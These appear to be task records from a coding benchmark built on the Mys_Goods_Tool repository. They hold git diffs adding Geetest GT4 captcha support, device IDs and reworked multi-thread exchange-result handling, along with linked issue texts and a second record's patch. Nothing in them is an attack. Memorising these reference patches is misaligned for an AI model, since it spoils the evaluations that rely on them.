api_result = ApiResultHandler(res.json())
- return BaseApiStatus(success=True), MmtData.parse_obj(api_result.data["mmt_data"]), client
+ return BaseApiStatus(success=True), MmtData.parse_obj(api_result.data["mmt_data"]), device_id, client
except tenacity.RetryError as e:
- if keep_client:
+ if client:
await client.aclose()
if is_incorrect_return(e):
logger.exception(f"获取短信验证-人机验证任务(create_mmt) - 服务器没有正确返回")
logger.debug(f"网络请求返回: {res.text}")
- return BaseApiStatus(incorrect_return=True), None, client
+ return BaseApiStatus(incorrect_return=True), None, device_id, client
else:
logger.exception(f"获取短信验证-人机验证任务(create_mmt) - 请求失败")
- return BaseApiStatus(network_error=True), None, None
- except ConnectError:
- if keep_client:
- await client.aclose()
- logger.exception(f"获取短信验证-人机验证任务(create_mmt) - 网络连接失败")
- return BaseApiStatus(network_error=True), None, None
+ return BaseApiStatus(network_error=True), None, device_id, None
async def create_mobile_captcha(phone_number: int,
mmt_data: MmtData,
- geetest_result: GeetestResult,
+ geetest_result: Union[GeetestResult, GeetestResultV4],
client: Optional[httpx.AsyncClient] = None,
+ use_v4: bool = True,
+ device_id: str = generate_device_id(),
retry: bool = True
) -> Tuple[CreateMobileCaptchaStatus, Optional[httpx.AsyncClient]]:
"""
@@ -720,19 +742,30 @@ async def create_mobile_captcha(phone_number: int,
:param mmt_data: 人机验证任务数据
:param geetest_result: 人机验证结果数据
:param client: httpx.AsyncClient 连接
+ :param use_v4: 是否使用极验第四代人机验证
+ :param device_id: 设备 ID
:param retry: 是否允许重试
"""
headers = HEADERS_WEBAPI.copy()
- headers["x-rpc-device_id"] = generate_device_id()
- params = {
- "action_type": "login",
- "mmt_key": mmt_data.mmt_key,
- "geetest_challenge": mmt_data.challenge,
- "geetest_validate": geetest_result.validate,
- "geetest_seccode": geetest_result.seccode,
- "mobile": phone_number,
- "t": round(NtpTime.time() * 1000)
- }
+ headers["x-rpc-device_id"] = device_id
+ if use_v4 and isinstance(geetest_result, GeetestResultV4):
+ params = {
+ "action_type": "login",
+ "mmt_key": mmt_data.mmt_key,
+ "geetest_v4_data": geetest_result.dict(skip_defaults=True),
+ "mobile": phone_number,
+ "t": round(NtpTime.time() * 1000)
+ }
+ else:
+ params = {
+ "action_type": "login",
+ "mmt_key": mmt_data.mmt_key,
+ "geetest_challenge": mmt_data.challenge,
+ "geetest_validate": geetest_result.validate,
+ "geetest_seccode": geetest_result.seccode,
+ "mobile": phone_number,
+ "t": round(NtpTime.time() * 1000)
+ }
encoded_params = urlencode(params)
async def request():
@@ -752,7 +785,7 @@ async def request():
# headers=headers,
# timeout=conf.preference.timeout)
# cookies.update(res.cookies)
- if client is not None:
+ if client and not client.is_closed:
res = await request()
else:
async with httpx.AsyncClient() as client:
diff --git a/mys_goods_tool/data_model.py b/mys_goods_tool/data_model.py
index c33e7890..8e2e0160 100644
--- a/mys_goods_tool/data_model.py
+++ b/mys_goods_tool/data_model.py
@@ -287,10 +287,15 @@ class MmtData(BaseModel):
"""
短信验证码-人机验证任务申请-返回数据
"""
- challenge: str
+ challenge: Optional[str]
gt: str
mmt_key: str
new_captcha: bool
+ risk_type: Optional[str]
+ """任务类型,如滑动拼图 slide"""
+ success: Optional[int]
+ use_v4: Optional[bool]
+ """是否使用极验第四代 GT4"""
class BaseApiStatus(BaseModel):
@@ -374,3 +379,14 @@ class ExchangeStatus(BaseApiStatus):
GeetestResult = NamedTuple("GeetestResult", validate=str, seccode=str)
"""人机验证结果数据"""
+
+
+class GeetestResultV4(BaseModel):
+ """
+ GEETEST GT4 人机验证结果数据
+ """
+ captcha_id: str
+ lot_number: str
+ pass_token: str
+ gen_time: int
+ captcha_output: str
diff --git a/mys_goods_tool/exchange_mode.py b/mys_goods_tool/exchange_mode.py
index 3fc31d67..f2f9b04e 100644
--- a/mys_goods_tool/exchange_mode.py
+++ b/mys_goods_tool/exchange_mode.py
@@ -122,36 +122,56 @@ def on_executed(event: JobExecutionEvent):
接收兑换结果
"""
if event.job_id.startswith("exchange-plan"):
+ thread_id = int(event.job_id.split('-')[-1])
result: Tuple[ExchangeStatus, Optional[ExchangeResult]] = event.retval
exchange_status, exchange_result = result
- plan = exchange_result.plan
-
- with lock:
- # 如果已经有一个线程兑换成功,就不再接收结果
- if True not in finished[plan]:
- thread_id = int(event.job_id.split('-')[-1])
- if exchange_result.result:
- finished[plan].append(True)
- logger.info(
- f"用户 {plan.account.bbs_uid}"
- f" - {plan.good.general_name}"
- f" - 线程 {thread_id}"
- f" - 兑换成功")
- else:
- finished[plan].append(False)
- logger.error(
- f"用户 {plan.account.bbs_uid}"
- f" - {plan.good.general_name}"
- f" - 线程 {thread_id}"
- f" - 兑换失败")
- if len(finished[plan]) == conf.preference.exchange_thread_count:
- try:
- conf.exchange_plans.remove(plan)
- except KeyError:
- pass
- else:
- conf.save()
+ if not exchange_status:
+ hash_value = int(event.job_id.split('-')[-2])
+ plan = filter(lambda x: x.__hash__() == hash_value, conf.exchange_plans)
+ plan = next(plan)
+ with lock:
+ finished[plan].append(False)
+ logger.error(
+ f"用户 {plan.account.bbs_uid}"
+ f" - {plan.good.general_name}"
+ f" - 线程 {thread_id}"
+ f" - 兑换请求发送失败")
+ if len(finished[plan]) == conf.preference.exchange_thread_count:
+ try:
+ conf.exchange_plans.remove(plan)
+ except KeyError:
+ pass
+ else:
+ conf.save()
+
+ else:
+ plan = exchange_result.plan
+ with lock:
+ # 如果已经有一个线程兑换成功,就不再接收结果
+ if True not in finished[plan]:
+ if exchange_result.result:
+ finished[plan].append(True)
+ logger.info(
+ f"用户 {plan.account.bbs_uid}"
+ f" - {plan.good.general_name}"
+ f" - 线程 {thread_id}"
+ f" - 兑换成功")
+ else:
+ finished[plan].append(False)
+ logger.error(
+ f"用户 {plan.account.bbs_uid}"
+ f" - {plan.good.general_name}"
+ f" - 线程 {thread_id}"
+ f" - 兑换失败")
+
+ if len(finished[plan]) == conf.preference.exchange_thread_count:
+ try:
+ conf.exchange_plans.remove(plan)
+ except KeyError:
+ pass
+ else:
+ conf.save()
elif event.job_id == "exchange-connection_test":
result: Union[float, bool, None] = event.retval
@@ -277,41 +297,62 @@ def on_executed(cls, event: JobExecutionEvent):
if event.job_id.startswith("exchange-plan"):
result: Tuple[ExchangeStatus, Optional[ExchangeResult]] = event.retval
exchange_status, exchange_result = result
- plan = exchange_result.plan
-
- with cls.lock:
- # 如果已经有一个线程兑换成功,就不再接收结果
- if True not in cls.finished[plan]:
- row = ExchangeResultRow.rows[plan]
- thread_id = int(event.job_id.split('-')[-1])
-
- if exchange_result.result:
- cls.finished[plan].append(True)
- logger.info(
- f"用户 {plan.account.bbs_uid}"
- f" - {plan.good.general_name}"
- f" - 线程 {thread_id}"
- f" - 兑换成功")
- text = f"[bold green]🎉 线程 {thread_id} - 兑换成功[/] "
- else:
- cls.finished[plan].append(False)
- logger.error(
- f"用户 {plan.account.bbs_uid}"
- f" - {plan.good.general_name}"
- f" - 线程 {thread_id}"
- f" - 兑换失败")
- text = f"[bold red]💦 线程 {thread_id} - 兑换失败[/] "
-
+ thread_id = int(event.job_id.split('-')[-1])
+ if not exchange_status:
+ hash_value = int(event.job_id.split('-')[-2])
+ plan = filter(lambda x: x.__hash__() == hash_value, conf.exchange_plans)
+ plan = next(plan)
+ row = ExchangeResultRow.rows[plan]
+ with cls.lock:
+ cls.finished[plan].append(False)
+ logger.error(
+ f"用户 {plan.account.bbs_uid}"
+ f" - {plan.good.general_name}"
+ f" - 线程 {thread_id}"
+ f" - 兑换失败")
+ text = f"[bold red]💦 线程 {thread_id} - 兑换请求失败[/] "
row.result_preview._add_children(ExchangeResultRow.get_result_static(text))
row.result_preview.refresh()
-
- if len(cls.finished[plan]) == conf.preference.exchange_thread_count:
- try:
- conf.exchange_plans.remove(plan)
- except KeyError:
- pass
- else:
- conf.save()
+ if len(cls.finished[plan]) == conf.preference.exchange_thread_count:
+ try:
+ conf.exchange_plans.remove(plan)
+ except KeyError:
+ pass
+ else:
+ conf.save()
+ else:
+ plan = exchange_result.plan
+ with cls.lock:
+ # 如果已经有一个线程兑换成功,就不再接收结果
+ if True not in cls.finished[plan]:
+ row = ExchangeResultRow.rows[plan]
+ if exchange_result.result:
+ cls.finished[plan].append(True)
+ logger.info(
+ f"用户 {plan.account.bbs_uid}"
+ f" - {plan.good.general_name}"
+ f" - 线程 {thread_id}"
+ f" - 兑换成功")
+ text = f"[bold green]🎉 线程 {thread_id} - 兑换成功[/] "
+ else:
+ cls.finished[plan].append(False)
+ logger.error(
+ f"用户 {plan.account.bbs_uid}"
+ f" - {plan.good.general_name}"
+ f" - 线程 {thread_id}"
+ f" - 兑换失败")
+ text = f"[bold red]💦 线程 {thread_id} - 兑换失败[/] "
+
+ row.result_preview._add_children(ExchangeResultRow.get_result_static(text))
+ row.result_preview.refresh()
+
+ if len(cls.finished[plan]) == conf.preference.exchange_thread_count:
+ try:
+ conf.exchange_plans.remove(plan)
+ except KeyError:
+ pass
+ else:
+ conf.save()
except:
logger.exception("接收兑换结果失败")
diff --git a/mys_goods_tool/login_view.py b/mys_goods_tool/login_view.py
index 7d64a487..4cd8ce2a 100644
--- a/mys_goods_tool/login_view.py
+++ b/mys_goods_tool/login_view.py
@@ -3,6 +3,7 @@
import asyncio
import queue
from typing import NamedTuple, Tuple, Optional, Set
+from urllib.parse import urlencode
import httpx
from rich.markdown import Markdown
@@ -12,7 +13,8 @@
)
from mys_goods_tool.api import create_mobile_captcha, create_mmt, get_login_ticket_by_captcha, \
- get_multi_token_by_login_ticket, get_cookie_token_by_stoken, get_stoken_v2_by_v1, get_ltoken_by_stoken
+ get_multi_token_by_login_ticket, get_cookie_token_by_stoken, get_stoken_v2_by_v1, get_ltoken_by_stoken, \
+ check_registrable
from mys_goods_tool.custom_css import *
from mys_goods_tool.custom_widget import RadioStatus, StaticStatus, ControllableButton, LoadingDisplay
from mys_goods_tool.data_model import GeetestResult, MmtData, GetCookieStatus
@@ -106,6 +108,8 @@ class PhoneForm(LoginForm):
"""
input = Input(placeholder="手机号", id="login_phone")
"""手机号输入框"""
+ device_id: Optional[str] = None
+ """人机验证过程的设备ID"""
client: Optional[httpx.AsyncClient] = None
"""人机验证过程的连接对象"""
@@ -181,13 +185,14 @@ async def listen_result(self):
except queue.Empty:
continue
else:
- logger.info(f"已收到Geetest验证结果数据 {geetest_result},将发送验证码至 {self.input.value}")
+ logger.info(f"已收到Geetest验证结果数据,将发送验证码至 {self.input.value}")
CaptchaLoginInformation.radio_tuple.geetest_finished.turn_on()
self.loading.show()
create_captcha_status, PhoneForm.client = await create_mobile_captcha(int(self.input.value),
self.mmt_data,
geetest_result,
- PhoneForm.client)
+ PhoneForm.client,
+ device_id=PhoneForm.device_id)
if create_captcha_status:
self.loading.hide()
logger.info(f"短信验证码已发送至 {self.input.value}")
@@ -232,8 +237,14 @@ def set_address_callback(self, address: Tuple[str, int]):
self.loop_tasks.add(task)
task.add_done_callback(self.loop_tasks.discard)
- link = f"http://{address[0]}:{address[1]}/index.html?gt={self.mmt_data.gt}&challenge={self.mmt_data.challenge}"
- link_localized = f"http://{address[0]}:{address[1]}/localized.html?gt={self.mmt_data.gt}&challenge={self.mmt_data.challenge}"
+ params = {
+ "gt": self.mmt_data.gt,
+ "mmtKey": self.mmt_data.mmt_key,
+ "riskType": self.mmt_data.risk_type
+ }
+ url_params = urlencode(params)
+ link = f"http://{address[0]}:{address[1]}/index.html?{url_params}"
+ link_localized = f"http://{address[0]}:{address[1]}/localized.html?{url_params}"
CaptchaLoginInformation.static_tuple.geetest_text.change_text(
renderable=f"\n- 请前往链接进行验证:\n"
f"[@click=app.open_link('{link}')]{link}[/]\n"
@@ -271,7 +282,15 @@ async def create_captcha(self):
if PhoneForm.client:
await PhoneForm.client.aclose()
- create_mmt_status, self.mmt_data, PhoneForm.client = await create_mmt(keep_client=True)
+ check_registrable_status, registrable, PhoneForm.device_id, PhoneForm.client = await check_registrable(
+ int(self.input.value))
+ if registrable:
+ self.close_create_captcha_send()
+ self.button.error.show()
+ self.app.notice("[red]该手机号尚未注册![/]")
+ return
+ create_mmt_status, self.mmt_data, PhoneForm.device_id, PhoneForm.client = await create_mmt(PhoneForm.client,
+ device_id=PhoneForm.device_id)
if not create_mmt_status:
self.close_create_captcha_send()
self.button.error.show()
@@ -330,7 +349,7 @@ def __init__(self):
self.before_login: bool = True
"""当前状态是否在登录操作之前(不处于正在登录的状态)"""
- self.input = Input(placeholder="为空时点击登录可进行Cookies刷新", id="login_captcha")
+ self.input = Input(placeholder="若发送验证码失败,也可前往米哈游通信证页面手动发送", id="login_captcha")
self.loading = LoadingDisplay()
self.loading.hide()
diff --git a/mys_goods_tool/tui.py b/mys_goods_tool/tui.py
index 683f0554..90f798c1 100644
--- a/mys_goods_tool/tui.py
+++ b/mys_goods_tool/tui.py
@@ -31,10 +31,9 @@
# Mys_Goods_Tool - 米游社商品兑换工具
## 更新说明
-- 修复米游社(大别野)等商品分区无商品的问题
-- 修复图形界面兑换模式下不会执行兑换的问题
-- 删除多余的 `pyperclip` 依赖
-- 解决部分商品兑换时间错误的问题
+- 修复启动后由于商品数据相关问题而导致的崩溃
+- 修复 Linux 实际不会应用 uvloop 的问题
+- 人机验证更新至 GT4(但实际上暂时不可用 [#105](https://github.com/Ljzd-PRO/Mys_Goods_Tool/issues/105#issuecomment-1552727784))
## 功能和特性
@@ -45,9 +44,6 @@
- 支持米游社所有分区的商品兑换
### TODO
-- 支持在图形界面中编辑偏好设置
-- 密码登录
-- 解决SSH客户端无法跳转人机验证链接的问题
- 更新至极验第四代适应性验证
## 其他
@@ -406,7 +402,7 @@ def _on_mount(self, _: events.Mount) -> None:
TuiApp.text_log_writer = TuiApp.TextLogWriter()
logger.add(self.text_log_writer, diagnose=False, level="DEBUG", format=LOG_FORMAT)
if sys.platform not in ('win32', 'cygwin', 'cli'):
- if "uvloop" not in sys.modules.copy():
+ if "uvloop" in sys.modules.copy():
import uvloop
import asyncio
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
diff --git a/mys_goods_tool/user_data.py b/mys_goods_tool/user_data.py
index 4022c5de..9cd0f8e3 100644
--- a/mys_goods_tool/user_data.py
+++ b/mys_goods_tool/user_data.py
@@ -412,7 +412,7 @@ class UserData(BaseModel):
用户数据类
"""
version: str = VERSION
- """本次修改用户数据文件的程序版本号"""
+ """创建用户数据文件的程序版本号"""
exchange_plans: Union[Set[ExchangePlan], List[ExchangePlan]] = set()
"""兑换计划列表"""
preference: Preference = Preference()
| debian运行出错 No module named 'uvloop'

完成人机验证后,卡在发送验证码阶段



跟进至GEETEST 第四代行为验证
跟进至GEETEST 第四代行为验证
完成人机验证后,卡在发送验证码阶段



完成人机验证后,卡在发送验证码阶段



完成人机验证后,卡在发送验证码阶段



完成人机验证后,卡在发送验证码阶段



完成人机验证后,卡在发送验证码阶段



跟进至GEETEST 第四代行为验证
完成人机验证后,卡在发送验证码阶段



跟进至GEETEST 第四代行为验证
| 2023-05-26T18:44:49 | 0.0 | [] | [] |
|||
Ljzd-PRO/Mys_Goods_Tool | Ljzd-PRO__Mys_Goods_Tool-96 | 3a0b525770f89208093435d4505340b5380b6746 | diff --git a/README.md b/README.md
index 519c9efb..afb9f70e 100644
--- a/README.md
+++ b/README.md
@@ -16,7 +16,9 @@
### 更新说明
-v2.0.0 开始的包含了图形化的小工具是基本上重做了,所以刚发布这段时间测试可能不太够,可能不太稳定。
+- 修复米游社(大别野)等商品分区无商品的问题
+- 修复图形界面兑换模式下不会执行兑换的问题
+- 删除多余的 `pyperclip` 依赖
## 功能和特性
diff --git a/mys_goods_tool/api.py b/mys_goods_tool/api.py
index 8550295a..c0a84308 100644
--- a/mys_goods_tool/api.py
+++ b/mys_goods_tool/api.py
@@ -533,12 +533,40 @@ async def get_good_detail(good_id: str, retry: bool = True) -> Tuple[GetGoodDeta
GetGoodDetailStatus(network_error=True), None
-async def get_good_list(game: str, retry: bool = True) -> Tuple[
+async def get_good_games(retry: bool = True) -> Tuple[BaseApiStatus, Optional[List[Tuple[str, str]]]]:
+ """
+ 获取商品分区列表
+
+ :param retry: 是否允许重试
+ :return: (商品分区全名, 字母简称) 的列表
+ """
+ try:
+ async for attempt in tenacity.AsyncRetrying(stop=custom_attempt_times(retry), reraise=True,
+ wait=tenacity.wait_fixed(conf.preference.retry_interval)):
+ with attempt:
+ async with httpx.AsyncClient() as client:
+ res = await client.get(URL_GOOD_LIST.format(page=1,
+ game=""),
+ headers=HEADERS_GOOD_LIST,
+ timeout=conf.preference.timeout)
+ api_result = ApiResultHandler(res.json())
+ return BaseApiStatus(success=True), list(map(lambda x: (x["name"], x["key"]), api_result.data["games"]))
+ except tenacity.RetryError as e:
+ if is_incorrect_return(e):
+ logger.exception(f"米游币商品兑换 - 获取商品列表: 服务器没有正确返回")
+ logger.debug(f"网络请求返回: {res.text}")
+ return BaseApiStatus(incorrect_return=True), None
+ else:
+ logger.exception(f"米游币商品兑换 - 获取商品列表: 网络请求失败")
+ return BaseApiStatus(network_error=True), None
+
+
+async def get_good_list(game: str = "", retry: bool = True) -> Tuple[
BaseApiStatus, Optional[List[Good]]]:
"""
获取商品信息列表
- :param game: 游戏简称
+ :param game: 游戏简称(默认为空,即获取所有游戏的商品)
:param retry: 是否允许重试
:return: 商品信息列表
"""
diff --git a/mys_goods_tool/custom_css.py b/mys_goods_tool/custom_css.py
index 6d0ce74d..ac149816 100644
--- a/mys_goods_tool/custom_css.py
+++ b/mys_goods_tool/custom_css.py
@@ -123,7 +123,7 @@ class AboveFold(Container):
DEFAULT_CSS = """
AboveFold {
width: 100%;
- height: 100%;
+ height: auto;
align: center middle;
}
"""
@@ -265,3 +265,52 @@ class ExchangePlanContent(Container):
height: 3;
}
"""
+
+
+class CaptchaTips(Container):
+ """
+ 登陆信息面板文本视图
+ """
+ DEFAULT_CSS = """
+ CaptchaTips {
+ height: 100%;
+ width: 1fr;
+ align: right middle;
+ padding: 1;
+ overflow: auto;
+ border: round #666;
+ }
+
+ App.-light-mode Tips {
+ border: round #CCC;
+ }
+
+ CaptchaTips StaticStatus {
+ width: 100%;
+ align: center top;
+ text-align: center;
+ }
+ """
+
+
+class CaptchaStepSet(Container):
+ """
+ 登陆进度节点集合视图
+ """
+ DEFAULT_CSS = """
+ CaptchaStepSet {
+ height: auto;
+ width: 1fr;
+ align: left middle;
+ overflow: auto;
+ border: round #666;
+ }
+
+ App.-light-mode StepSet {
+ border: round #CCC;
+ }
+
+ CaptchaStepSet RadioStatus {
+ margin: 1 1;
+ }
+ """
diff --git a/mys_goods_tool/custom_widget.py b/mys_goods_tool/custom_widget.py
index f3de9894..d2e77bec 100644
--- a/mys_goods_tool/custom_widget.py
+++ b/mys_goods_tool/custom_widget.py
@@ -1,7 +1,7 @@
from __future__ import annotations
from itertools import zip_longest
-from typing import Optional
+from typing import Optional, Tuple
from rich.console import RenderableType
from rich.text import TextType
@@ -16,7 +16,6 @@
from textual.widgets._tabbed_content import ContentTab
from mys_goods_tool.custom_css import *
-from mys_goods_tool.data_model import GameInfo
from mys_goods_tool.user_data import ExchangePlan
@@ -217,10 +216,10 @@ def __init__(
id: str | None = None,
classes: str | None = None,
disabled: bool = False,
- game: GameInfo
+ partition: Tuple[str, str]
):
super().__init__(label, variant, name=name, id=id, classes=classes, disabled=disabled)
- self.game = game
+ self.partition = partition
class Pressed(Button.Pressed):
def __init__(self, button: GameButton):
diff --git a/mys_goods_tool/exchange_mode.py b/mys_goods_tool/exchange_mode.py
index 1be76fc7..72f84d6d 100644
--- a/mys_goods_tool/exchange_mode.py
+++ b/mys_goods_tool/exchange_mode.py
@@ -7,8 +7,9 @@
import ping3
from apscheduler.events import JobExecutionEvent, EVENT_JOB_EXECUTED
-from apscheduler.schedulers.asyncio import AsyncIOScheduler
-from apscheduler.schedulers.base import STATE_STOPPED
+from apscheduler.schedulers.background import BackgroundScheduler
+from apscheduler.schedulers.base import STATE_STOPPED, BaseScheduler
+from apscheduler.schedulers.blocking import BlockingScheduler
from rich.console import RenderableType
from textual import events
from textual.app import ComposeResult
@@ -51,11 +52,10 @@ def _connection_test():
return result
-def get_scheduler():
+def set_scheduler(scheduler: BaseScheduler):
"""
- 获取兑换计划调度器
+ 向兑换计划调度器添加兑换任务以及ping循环
"""
- scheduler = AsyncIOScheduler()
scheduler.configure(timezone=conf.preference.timezone or Preference.timezone)
if conf.preference.enable_connection_test:
@@ -99,7 +99,7 @@ def exchange_mode_simple():
logger.info("无兑换计划需要执行")
return
- scheduler = get_scheduler()
+ scheduler = set_scheduler(BlockingScheduler())
finished_plans = set()
@lambda func: scheduler.add_listener(func, EVENT_JOB_EXECUTED)
@@ -138,12 +138,12 @@ def on_executed(event: JobExecutionEvent):
f"Ping 商品兑换API服务器 {_get_api_host() or 'N/A'} - 延迟 {round(result, 2) if result else 'N/A'} ms")
try:
+ logger.info("启动兑换计划定时器")
scheduler.start()
- logger.info("兑换计划定时器已启动")
- asyncio.get_event_loop().run_forever()
+
except KeyboardInterrupt:
+ logger.info("停止兑换计划定时器")
scheduler.shutdown()
- logger.info("兑换计划定时器已停止")
class EnterExchangeMode(Event):
@@ -212,7 +212,7 @@ class ExchangeModeView(Container):
button_exit.hide()
warning_text = ExchangeModeWarning()
"""进入/退出 兑换模式的提示文本"""
- scheduler = get_scheduler()
+ scheduler = set_scheduler(BackgroundScheduler())
"""兑换计划调度器"""
empty_data_item = ListItem(Static("暂无兑换计划,你可以尝试刷新"))
list_view = ListView(empty_data_item)
@@ -372,7 +372,6 @@ class ExchangeModePing(Static):
"""
DEFAULT_VALUE = False
ping_value: reactive[Union[float, bool, None]] = reactive(DEFAULT_VALUE)
- scheduler = get_scheduler()
def render(self) -> RenderableType:
return f"⚡ Ping | 商品兑换API服务器 [yellow]{_get_api_host() or 'N/A'}[/]" \
diff --git a/mys_goods_tool/exchange_plan_view.py b/mys_goods_tool/exchange_plan_view.py
index 990889ef..ed3d42a6 100644
--- a/mys_goods_tool/exchange_plan_view.py
+++ b/mys_goods_tool/exchange_plan_view.py
@@ -14,12 +14,12 @@
)
from textual.widgets._option_list import Option, Separator
-from mys_goods_tool.api import get_good_list, get_game_list, get_address, get_game_record, good_exchange, \
- get_good_detail
+from mys_goods_tool.api import get_good_list, get_address, get_game_record, good_exchange, \
+ get_good_detail, get_good_games
from mys_goods_tool.custom_css import *
from mys_goods_tool.custom_widget import StaticStatus, ControllableButton, LoadingDisplay, \
DynamicTabbedContent, GameButton, PlanButton, UnClickableItem
-from mys_goods_tool.data_model import Good, GameInfo, Address, GameRecord
+from mys_goods_tool.data_model import Good, Address, GameRecord
from mys_goods_tool.user_data import config as conf, UserAccount, ExchangePlan
_T = TypeVar("_T")
@@ -242,10 +242,10 @@ class GoodsContent(BaseExchangePlan):
loading = LoadingDisplay()
loading.hide()
- good_dict: Dict[int, GoodsDictValue] = {}
- """获取到的商品数据以及相关的控件"""
- selected_tuple: Optional[Tuple[GameInfo, int]] = None
- """已选择的商品位置"""
+ good_dict: Dict[str, GoodsDictValue] = {}
+ """获取到的商品数据以及相关的控件 商品分区简称 -> 商品数据"""
+ selected_tuple: Optional[Tuple[Tuple[str, str], int]] = None
+ """已选择的商品位置 ((商品分区, 分区简称), 商品在OptionList中的位置)"""
empty_data_option = Option("暂无商品数据,可能是目前没有限时兑换的商品,可尝试刷新", disabled=True)
"""空的商品选项列表"""
@@ -257,28 +257,29 @@ class GoodsDictValue:
"""
def __init__(self,
- game_info: GameInfo,
+ partition: Tuple[str, str],
button_select: Optional[GameButton] = None,
tap_pane: Optional[TabPane] = None,
good_list: List[Good] = None,
):
"""
- :param game_info: 商品频道数据
+ :param partition: (商品分区, 字母简称) 数据
:param tap_pane: 频道对应的 `TabPane` 标签页
:param good_list: 商品数据
:param button_select: 选择商品的按钮
"""
- self.game_info = game_info
+ name, abbr = partition
+ self.partition = partition
"""商品频道数据"""
self.button_select = button_select or GameButton(
"💾 确定",
- id=f"button-goods-select-{game_info.id}",
+ id=f"button-goods-select-{abbr}",
disabled=True,
- game=game_info)
+ partition=partition)
"""选择商品的按钮"""
self.option_list = OptionList(GoodsContent.empty_data_option, disabled=True)
"""商品的选项列表"""
- self.tap_pane = tap_pane or TabPane(game_info.name, Horizontal(self.button_select, self.option_list))
+ self.tap_pane = tap_pane or TabPane(name, Horizontal(self.button_select, self.option_list))
"""频道对应的 `TabPane` 标签页"""
self.good_list = good_list
"""商品数据"""
@@ -300,13 +301,14 @@ async def update_data(self):
self.button_refresh.disable()
for goods_data in self.good_dict.values():
- good_list_status, good_list = await get_good_list(goods_data.game_info.op_name)
+ name, abbr = goods_data.partition
+ good_list_status, good_list = await get_good_list(abbr)
good_list = list(filter(lambda x: x.is_time_limited() and not x.is_time_end(), good_list))
# 一种情况是获取成功但返回的商品数据为空,一种是API请求失败
goods_data.option_list.clear_options()
if not good_list_status:
- self.app.notice(f"[bold red]获取频道 [bold red]{goods_data.game_info.name}[/] 的商品数据失败![/]")
+ self.app.notice(f"[bold red]获取频道 [bold red]{name}[/] 的商品数据失败![/]")
# TODO 待补充各种错误情况
if good_list:
goods_data.good_list = good_list
@@ -331,13 +333,15 @@ async def _on_mount(self, _: events.Mount):
self.loading.show()
# 更新商品频道列表
- game_list_status, game_list = await get_game_list()
- if game_list_status:
- for game in game_list:
- if game.id not in self.good_dict:
+ partition_status, partition_all = await get_good_games()
+ # 过滤掉 "全部" 分区
+ partitions = filter(lambda x: x[1] != "all", partition_all)
+ if partition_status:
+ for name, abbr in partitions:
+ if abbr not in self.good_dict:
# 如果没有商品频道对应值,则进行创建
- goods_data = self.GoodsDictValue(game)
- self.good_dict.setdefault(game.id, goods_data)
+ goods_data = self.GoodsDictValue((name, abbr))
+ self.good_dict.setdefault(abbr, goods_data)
await self.tabbed_content.append(goods_data.tap_pane)
# 更新每个频道的商品数据
@@ -377,22 +381,19 @@ async def _on_button_pressed(self, event: GameButton.Pressed) -> None:
if event.button.id.startswith("button-goods-select"):
# 按下“保存”按钮时触发的事件
- game = event.button.game
- if not game:
- self.app.notice("[bold red]未找到对应的频道数据或频道不可用[/]")
- return
- option_list = self.good_dict[game.id].option_list
+ name, abbr = event.button.partition
+ option_list = self.good_dict[abbr].option_list
selected_index = option_list.highlighted
if selected_index is None:
self.app.notice("[bold red]请先从列表中选择商品![/]")
return
- good_dict_value = self.good_dict.get(game.id)
+ good_dict_value = self.good_dict.get(abbr)
if not good_dict_value:
self.app.notice("[bold red]未找到对应的频道[/]")
return
good = good_dict_value.good_list[selected_index]
- GoodsContent.selected_tuple = game, selected_index
+ GoodsContent.selected_tuple = name, abbr, selected_index
# 获取商品详情
self.loading.show()
@@ -421,7 +422,7 @@ async def _on_button_pressed(self, event: GameButton.Pressed) -> None:
self.text_view.update(f"已选择商品:"
f"\n[list]"
- f"\n🗂️ 商品频道:[bold green]{game.name}[/]"
+ f"\n🗂️ 商品频道:[bold green]{name}[/]"
f"\n📌 名称:[bold green]{good.general_name}[/]"
f"\n💰 价格:[bold green]{good.price}[/] 米游币"
f"\n📦 库存:[bold green]{good.stoke_text}[/] 件"
diff --git a/mys_goods_tool/login_view.py b/mys_goods_tool/login_view.py
index d241bfdc..7d64a487 100644
--- a/mys_goods_tool/login_view.py
+++ b/mys_goods_tool/login_view.py
@@ -54,53 +54,6 @@ class CaptchaLoginInformation(Container):
}
"""
- class Tips(Container):
- """
- 登陆信息面板文本视图
- """
- DEFAULT_CSS = """
- Tips {
- height: 100%;
- width: 1fr;
- align: right middle;
- padding: 1;
- overflow: auto;
- border: round #666;
- }
-
- App.-light-mode Tips {
- border: round #CCC;
- }
-
- Tips StaticStatus {
- width: 100%;
- align: center top;
- text-align: center;
- }
- """
-
- class StepSet(Container):
- """
- 登陆进度节点集合视图
- """
- DEFAULT_CSS = """
- StepSet {
- height: auto;
- width: 1fr;
- align: left middle;
- overflow: auto;
- border: round #666;
- }
-
- App.-light-mode StepSet {
- border: round #CCC;
- }
-
- StepSet RadioStatus {
- margin: 1 1;
- }
- """
-
RadioTuple = NamedTuple("RadioTuple",
create_geetest=RadioStatus,
http_server=RadioStatus,
@@ -140,8 +93,8 @@ class StepSet(Container):
geetest_text=StaticStatus(GEETEST_TEXT)
)
- radio_set = StepSet(*radio_tuple)
- static_set = Tips(*static_tuple)
+ radio_set = CaptchaStepSet(*radio_tuple)
+ static_set = CaptchaTips(*static_tuple)
def compose(self) -> ComposeResult:
yield Horizontal(self.radio_set, self.static_set)
diff --git a/mys_goods_tool/tui.py b/mys_goods_tool/tui.py
index c5d94cd2..0f09ea58 100644
--- a/mys_goods_tool/tui.py
+++ b/mys_goods_tool/tui.py
@@ -27,8 +27,15 @@
from mys_goods_tool.utils import LOG_FORMAT, logger
WELCOME_MD = """
+# Mys_Goods_Tool - 米游社商品兑换工具
+
+## 更新说明
+- 修复米游社(大别野)等商品分区无商品的问题
+- 修复图形界面兑换模式下不会执行兑换的问题
+
## 功能和特性
-- 使用 Textual 终端图形界面库,支持 Windows / Linux / macOS 甚至可能是移动端SSH客户端
+
+- 使用 [Textual](https://github.com/Textualize/textual) 终端图形界面库,支持 Windows / Linux / macOS 甚至可能是移动端SSH客户端
- 短信验证码登录(只需接收一次验证码)
- 内置人机验证页面,无需前往官网验证
- 多账号支持
@@ -37,22 +44,21 @@
### TODO
- 支持在图形界面中编辑偏好设置
- 密码登录
-
-## 偏好设置
-默认配置下基本上可以正常使用,如果需要修改配置,可以参考 [`mys_goods_tool/user_data.py`]() 进行配置。
-
-默认配置文件路径为 `./user_data.json`,可以通过 `-c` 或 `--conf` 参数指定配置文件路径。
+- 解决SSH客户端无法跳转人机验证链接的问题
+- 更新至极验第四代适应性验证
## 其他
